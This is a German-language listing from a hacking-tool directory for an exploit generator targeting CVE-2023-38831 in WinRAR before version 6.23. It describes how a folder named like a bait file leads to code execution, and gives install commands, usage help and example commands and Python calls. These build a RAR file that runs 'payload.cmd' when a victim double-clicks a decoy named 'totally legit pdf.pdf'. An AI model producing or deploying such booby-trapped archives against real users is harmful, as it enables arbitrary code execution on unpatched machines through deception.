Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38831-RaRCE — Ein einfach zu installierendes und einfach auszuführendes Tool zum Generieren von Exploit-Payloads für CVE-2023-38831, WinRAR RCE vor Version 6.23 | Kitploit
Tools/GitHubGitHub/ignis-sec/cve-2023-38831-rarce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubignis-sec/cve-2023-38831-rarce

CVE-2023-38831-RaRCE

Ein einfach zu installierendes und einfach auszuführendes Tool zum Generieren von Exploit-Payloads für CVE-2023-38831, WinRAR RCE vor Version 6.23

Repository anzeigen
113182vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RaRCE, Exploit-Generator für CVE-2023-38831

Contributors Forks Stargazers Issues GitHub

Dies ist ein einfach zu installierender und einfach zu verwendender, vielseitiger Exploit-Generator für CVE-2023-38831, eine Schwachstelle, die WinRAR-Versionen vor 6.23 betrifft.

RARLabs WinRAR vor 6.23 ermöglicht Angreifern die Ausführung von beliebigem Code, wenn ein Benutzer versucht, eine harmlose Datei in einem ZIP-Archiv anzuzeigen. Das Problem tritt auf, weil ein ZIP-Archiv eine harmlose Datei (z. B. eine gewöhnliche .JPG-Datei) und auch einen Ordner enthalten kann, der denselben Namen wie die harmlose Datei hat, und der Inhalt des Ordners (der ausführbare Inhalte enthalten kann) beim Versuch, nur auf die harmlose Datei zuzugreifen, verarbeitet wird. Diese Schwachstelle wurde von April bis August 2023 in freier Wildbahn ausgenutzt.

So installieren Sie es

Mit pip

Sie können das Tool einfach per pip installieren.

root@kitploit:~
pip install rarce

Oder Sie können es aus dem Quellcode verwenden.

root@kitploit:~
git clone https://github.com/ignis-sec/CVE-2023-38831-RaRCE
cd CVE-2023-38831-RaRCE
python3 setup.py install

So verwenden Sie es

root@kitploit:~
usage: rarce [-h] [-v] [-i] [-dt] [-pt PRESERVE_TEMP] bait switch output

Exploit-Generator für CVE-2023-38831

positionale Argumente:
  bait                  Pfad zur Köderdatei, die dem Archiv hinzugefügt werden soll.
  switch                Pfad zur Payload, die beim Doppelklick die Köderdatei ersetzt.
  output                Pfad zur Ausgabedatei.

optionale Argumente:
  -h, --help            Zeigt diese Hilfemeldung an und beendet das Programm.
  -v, --verbose         Ausführliche Ausgabe.
  -i, --ignore-path-check
                        Ignoriert die Pfadprüfung. Wenn gesetzt, kann rarce vorhandene Dateien im Ausgabeparameter überschreiben und fehlende Ordner für den Ausgabepfad erstellen.
  -dt, --dont-use-tempdir
                        Verhindert die Erstellung eines temporären Verzeichnisses beim Erstellen des Exploits. Stattdessen werden die Zwischenordner im aktuellen Arbeitsverzeichnis erstellt.
  -pt PRESERVE_TEMP, --preserve-temp PRESERVE_TEMP
                        Behält das temporäre Verzeichnis nach dem Erstellen des Exploits bei. Hat keine Auswirkung, wenn -dt oder --dont-use-tempdir nicht angegeben ist.

Nach der Installation per pip oder setup.py können Sie dieses Tool von der Befehlszeile aus verwenden. Der folgende Befehl erstellt die Exploit-Datei für Sie. Wenn ein Benutzer auf die Köderdatei doppelklickt, wird stattdessen das Payload-Skript oder die ausführbare Datei ausgeführt.

root@kitploit:~
$ rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"

Optional können Sie es als ausführbares Modul verwenden.

root@kitploit:~
python -m rarce "totally legit pdf.pdf" "payload.cmd" "exploit.rar"

Sie können es auch in Ihrem vorhandenen Code verwenden.

root@kitploit:~
from rarce import exploit

exploit("totally legit pdf.pdf", "payload.cmd", "exploit.rar")
Tool herunterladen